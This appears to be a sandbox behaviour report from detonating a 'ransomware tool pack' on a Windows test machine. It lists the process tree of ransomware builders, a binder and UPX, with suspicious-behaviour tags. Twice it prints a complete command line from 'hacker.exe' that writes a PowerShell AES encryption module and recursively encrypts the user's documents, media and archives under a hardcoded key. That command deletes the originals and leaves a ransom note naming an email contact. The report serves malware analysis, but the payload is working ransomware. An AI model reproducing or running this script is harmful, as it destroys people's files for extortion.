ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2412	attrib.exe
4612	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware tool pack.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1868

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:952

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\Builder.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:720
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\Builder.exe
  "C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\Builder.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3336

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5036

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\configuretion.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\configuretion.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\configuretion.exe
  "C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\configuretion.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.microsoft.com/en-in/download/details.aspx?id=44266
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa86a246f8,0x7ffa86a24708,0x7ffa86a24718
      4⤵
      PID:2548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
      4⤵
      PID:3468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
      4⤵
      PID:4976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      4⤵
      PID:1376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      4⤵
      PID:1256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
      4⤵
      PID:4740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
      4⤵
      PID:1352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
      4⤵
      PID:3120
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
      4⤵
      PID:1388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
      4⤵
      PID:1980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,4773442112377627696,11817686314785802777,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Python27\Scripts\pip.exe install pycrypto
    3⤵
    PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Python27\Scripts\pip.exe install pyinstaller
    3⤵
    PID:1920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1388

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3812

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\ss.jpeg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:1888

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:448

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus building tools\Scripted-Ransomware-builder-master\Scripted-Ransomware-builder-master\ss.jpeg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3632

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2728

C:\Users\Admin\Desktop\Ransomware Builder V2\ransom_builder.exe
"C:\Users\Admin\Desktop\Ransomware Builder V2\ransom_builder.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3808
- C:\Users\Admin\AppData\Local\Temp\Include.exe
  "C:\Users\Admin\AppData\Local\Temp\Include.exe"
  2⤵
  - Executes dropped EXE
  PID:2624

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4ec 0x500
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1812

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3496
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" a -i#7zMap25300:180:7zEvent18377 -ad -saa -- "C:\Users\Admin\AppData\Local\Temp\binder"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- C:\Users\Admin\AppData\Local\Temp\upx.exe
  "C:\Users\Admin\AppData\Local\Temp\upx.exe"
  2⤵
  - Executes dropped EXE
  PID:632

C:\Users\Admin\AppData\Local\Temp\Temp1_hacker.zip\hacker.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_hacker.zip\hacker.exe"
1⤵
PID:2504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 & echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result = Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-Error $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 & echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi, *.zip, *.rar, *.exe, *.apk, ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText NDgxMmMyZDc5N2IwOTUyNjQ3Y2ZlNGNiZGRkOTMxMGQ= -Suffix '.hacker' -RemoveSource } >> cry.ps1 & echo echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: 7f8f-73d9-d0ae' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c mkdir C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c cd C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5068

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe"
1⤵
PID:1176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 & echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result = Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-Error $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 & echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi, *.zip, *.rar, *.exe, *.apk, ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText NDgxMmMyZDc5N2IwOTUyNjQ3Y2ZlNGNiZGRkOTMxMGQ= -Suffix '.hacker' -RemoveSource } >> cry.ps1 & echo echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: 7f8f-73d9-d0ae' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  2⤵
  - System Location Discovery: System Language Discovery
